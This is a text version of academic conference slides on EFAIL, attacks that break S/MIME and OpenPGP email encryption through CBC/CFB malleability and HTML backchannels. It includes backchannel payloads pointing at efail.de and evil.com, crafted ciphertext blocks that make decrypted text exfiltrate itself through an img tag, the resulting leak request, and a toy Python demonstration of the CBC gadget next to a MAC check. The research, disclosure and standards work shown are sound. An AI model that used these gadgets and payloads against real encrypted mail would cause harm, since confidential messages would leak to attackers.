SLIDE 1

EFAIL

BREAKING S/MIME AND OPENPGP EMAIL ENCRYPTION USING EXFILTRATION CHANNELS

22.11.18 EFAIL – Poddebniak, Dresen, Müller, Ising, Schinzel, Friedberger, Somorovsky, Schwenk 1

Damian Poddebniak1, Christian Dresen1, Jens Müller2, Fabian Ising1, Sebastian Schinzel1, Simon Friedberger3, Juraj Somorovsky2, Jörg Schwenk2

1 Münster University of Applied Sciences 2 Ruhr University Bochum 3 NXP Semiconductors

mail@efail.de | https://www.efail.de

SLIDE 2

Motivation for email encryption

Nation state attackers

  • Massive collection of emails
  • Snowden revelations on pervasive surveillance

Breach of email provider / email account

  • Single point of failure
  • Aren’t they reading / analyzing my emails anyway?

Insecure transport

  • TLS might be used – we don’t know in advance!

SLIDE 3

Email e2e encryption

TWO COMPETING STANDARDS

OpenPGP (RFC 4880)

  • Favored by privacy advocates
  • Web-of-trust (no authorities)

S/MIME (RFC 5751)

  • Favored by organizations
  • Multi root trust hierarchies

SLIDE 4

Security of email encryption

?

  • Request/response protocols
  • Email is non-interactive

SLIDE 5

Backchannel techniques

Forcing an email client to send responses via backchannels

  • HTML/CSS
  • Email header
  • Attachment preview
  • Certificate verification

    <img src="http://efail.de">
    <object data="ftp://efail.de">
    <style>@import '//efail.de'</style>
    ...

SLIDE 6

Backchannel techniques

Forcing an email client to send responses via backchannels

  • HTML/CSS
  • Email header
  • Attachment preview
  • Certificate verification

    Disposition-Notification-To: eve@evil.com
    Remote-Attachment-URL: http://efail.de
    X-Image-URL: http://efail.de
    …

SLIDE 7

Backchannel techniques

Forcing an email client to send responses via backchannels

  • HTML/CSS
  • Email header
  • Attachment preview
  • Certificate verification

PDF, SVG, VCards, etc.

SLIDE 8

Backchannel techniques

Forcing an email client to send responses via backchannels

  • HTML/CSS
  • Email header
  • Attachment preview
  • Certificate verification

OCSP, CRL, intermediate certs

SLIDE 9

Evaluation of backchannels in email clients

[Figure: matrix of tested email clients grouped by platform, each marked with one of the legend categories]

Platforms: Windows, Linux, macOS, iOS, Android, Webmail, Webapp

Clients: Outlook, IBM Notes, Postbox, Foxmail, Live Mail, Pegasus, The Bat!, Mulberry, eM Client, Thunderbird, Evolution, KMail, Trojitá, Claws, Mutt, Apple Mail, Airmail, MailMate, Mail App, CanaryMail, Outlook, K-9 Mail, R2Mail, MailDroid, Nine, GMail, Outlook.com, Yahoo!, iCloud, GMX, HushMail, Mail.ru, FastMail, Roundcube, RainLoop, AfterLogic, Horde IMP, ProtonMail, Mailfence, Mailbox, ZoHo Mail, W8Mail, W10Mail, WLMail, Mailpile, Exchange, GroupWise

Legend: No user interaction; User interaction; Leak via bypass; Javascript execution

SLIDE 10

Evaluation of backchannels in email clients

[Figure: the client matrix from slide 9, repeated]

40/47 clients have backchannels requiring no user interaction

SLIDE 11

Attacker model

SLIDE 12

Attacker model

SLIDE 13

S/MIME

SLIDE 14

Malleability of CBC

[Figure: CBC decryption diagram. Labels: C0, C1, C2, decryption, P0, P1]

SLIDE 15

Malleability of CBC

[Figure: CBC decryption diagram (C0, C1, C2, P0, P1), animation step with bit values]

SLIDE 16

Malleability of CBC

[Figure: CBC decryption diagram (C0, C1, C2, P0, P1), animation step with bit values]

SLIDE 17

Malleability of CBC

[Figure: CBC decryption diagram (C0, C1, C2, P0, P1), animation step with bit values]

SLIDE 18

Malleability of CBC

[Figure: CBC decryption diagram (C0, C1, C2, P0, P1), animation step with bit values]

SLIDE 19

Malleability of CBC

[Figure: CBC decryption diagram (C0, C1, C2, P0, P1), animation step with bit values]

SLIDE 20

Malleability of CBC

[Figure: CBC decryption diagram (C0, C1, C2, P0, P1), animation step with bit values]

SLIDE 21

Malleability of CBC

[Figure: CBC decryption diagram (C0, C1, C2, P0, P1), animation step with bit values]

SLIDE 22

Malleability of CBC

[Figure: CBC decryption diagram (C0, C1, C2, P0, P1), animation step with bit values and a "?"]

SLIDE 23

Malleability of CBC

Blocks: C0, C1, C2

  C1 → decryption → P0 = Content-type: te
  C2 → decryption → P1 = xt/html\nDear Bob

SLIDE 24

Malleability of CBC

Blocks: C0', C1, C2

  C1 → decryption → P0' = Zontent-type: te
  C2 → decryption → P1 = xt/html\nDear Bob

SLIDE 25

Malleability of CBC

CBC Gadget

Blocks: C0 ⊕ P0, C1, C2

  C1 → decryption → P0' = 0000000000000000
  C2 → decryption → P1 = xt/html\nDear Bob

SLIDE 26

Malleability of CBC

Blocks: C0 ⊕ P0 ⊕ Pc, C1, C2

  C1 → decryption → P0' = <img src="ev.il/
  C2 → decryption → P1 = xt/html\nDear Bob

SLIDE 27

Malleability of CBC

Blocks: C0, C1', C2

  C1' → decryption → P0' = Content-type: te
  C2 → decryption → P1' = Zt/html\nDear Bob

SLIDE 28

Malleability of CBC

Blocks: C0, C1', C2

  C1' → decryption → P0' = ????????????????
  C2 → decryption → P1' = Zt/html\nDear Bob

SLIDE 29

Attacking S/MIME

No MAC
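
The CBC gadget from slides 25 and 26, together with the "No MAC" point above, as an added example (not code from the slides or from the EFAIL authors). It assumes a toy Feistel permutation as a stand-in for AES, constructed keys, IV and message blocks, and a neutral `CHOSEN-PLAINTEXT` block for Pc; it also shows an encrypt-then-MAC check rejecting the same modification.

```python
import hashlib, hmac
BS = 16  # block size in bytes (same as AES)

def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def _f(key, rnd, half):  # Feistel round function
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:BS // 2]

def enc_block(key, blk):  # toy 4-round Feistel permutation, a stand-in for AES
    l, r = blk[:8], blk[8:]
    for i in range(4):
        l, r = r, xor(l, _f(key, i, r))
    return l + r

def dec_block(key, blk):  # inverse of enc_block
    l, r = blk[:8], blk[8:]
    for i in reversed(range(4)):
        l, r = xor(r, _f(key, i, l)), l
    return l + r

def cbc_encrypt(key, iv, pt):  # returns [C0 (the IV), C1, C2, ...]
    blocks = [iv]
    for i in range(0, len(pt), BS):
        blocks.append(enc_block(key, xor(pt[i:i + BS], blocks[-1])))
    return blocks

def cbc_decrypt(key, blocks):  # P(i-1) = D(Ci) xor C(i-1), slide notation
    return b"".join(xor(dec_block(key, c), p) for p, c in zip(blocks, blocks[1:]))

def gadget(c0, c1, known_p0, chosen):  # X = C0 xor P0 xor Pc; (X, C1) decrypts to Pc
    return [xor(xor(c0, known_p0), chosen), c1]

def tag(mac_key, blocks):  # HMAC over IV and ciphertext (encrypt-then-MAC)
    return hmac.new(mac_key, b"".join(blocks), hashlib.sha256).digest()

def open_sealed(enc_key, mac_key, blocks, t):  # verify first, release nothing on mismatch
    if not hmac.compare_digest(t, tag(mac_key, blocks)):
        return None
    return cbc_decrypt(enc_key, blocks)

# Constructed sample values (not taken from a real message)
ENC_KEY, MAC_KEY, IV = b"k" * 16, b"m" * 32, bytes(range(16))
P0, P1 = b"Content-type: te", b"xt/html\nDear Bob"
CT = cbc_encrypt(ENC_KEY, IV, P0 + P1)
FORGED = gadget(CT[0], CT[1], P0, b"CHOSEN-PLAINTEXT")

print(cbc_decrypt(ENC_KEY, FORGED))                             # plain CBC accepts the forgery
print(open_sealed(ENC_KEY, MAC_KEY, FORGED, tag(MAC_KEY, CT)))  # MAC check rejects it
```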

SLIDE 30

Attacking S/MIME

PRACTICAL ATTACK AGAINST S/MIME

[Figure: original and crafted ciphertext, shown as decrypted 16-byte blocks. Techniques: Changing, Duplicating, Reordering]

Original:

  Content-type: te | xt/html\nDear Sir | or Madam, the se | ecret meeting wi

Crafted:

  ???????????????? | <base "
  ???????????????? | " href="http:">
  ???????????????? | <img "
  ???????????????? | " src="efail.de/
  Content-type: te | xt/html\nDear Sir | or Madam, the se | ecret meeting wi
  ???????????????? | ">

Resulting request:

  GET /...Dear%20Sir%20or%20Madam%2C%20the%20secret%20meeting%20wi... HTTP/1.1
  Host: efail.de

SLIDE 31

Practical attack against S/MIME

ATTACKER MODEL

SLIDE 32

OpenPGP

SLIDE 33

Attacking OpenPGP

DIFFERENCES TO S/MIME

  • OpenPGP uses a variation of CFB-Mode
  • OpenPGP defines primitives for integrity protection
  • Plaintext compression is enabled by default

[Figure: CFB-mode diagram. Labels: Ci, Ci+1, Pi (known), Pi-1, X, Pc (chosen), random plaintext, encryption]

SLIDE 34

Attacking OpenPGP

DEFEATING INTEGRITY PROTECTION

[Table: per-client results in the columns "MDC Stripped", "MDC Incorrect" and "SEIP -> SE", each cell marked Vulnerable or Not Vulnerable; the cell values are not recoverable here]

  Client             | Plugin (up to version)
  Outlook 2007       | GPG4WIN 3.0.0
  Outlook 2010       | GPG4WIN
  Outlook 2013       | GPG4WIN
  Outlook 2016       | GPG4WIN
  Thunderbird        | Enigmail 1.9.9
  Apple Mail (OSX)   | GPGTools 2018.01

SLIDE 35

Attacking OpenPGP

RFC 4880 ON MODIFICATION DETECTION CODES

SLIDE 37

Impact on the standards

CURRENT DRAFTS

S/MIME standard draft - draft-ietf-lamps-rfc5751-bis-11

  • References EFAIL paper
  • Recommends usage of authenticated encryption

OpenPGP standard draft - draft-ietf-openpgp-rfc4880bis-05

  • Deprecates Symmetrically Encrypted (SE) data packets (due to downgrade attack)
  • Proposes chunk size limits for AEAD protected data packets
  • Implementations should not allow users to access modified plaintexts

SLIDE 38

S/MIME OpenPGP

SLIDE 39

Disclosure

SLIDE 40

Disclosure

SLIDE 41

Conclusions

  • Introduced malleability gadgets
  • Self-exfiltrating plaintexts
  • Evaluation of backchannels
  • Crypto standards need to evolve
  • Current S/MIME is broken
  • OpenPGP needs clarification
  • Secure HTML email is challenging

Thank you! Questions?

https://www.efail.de/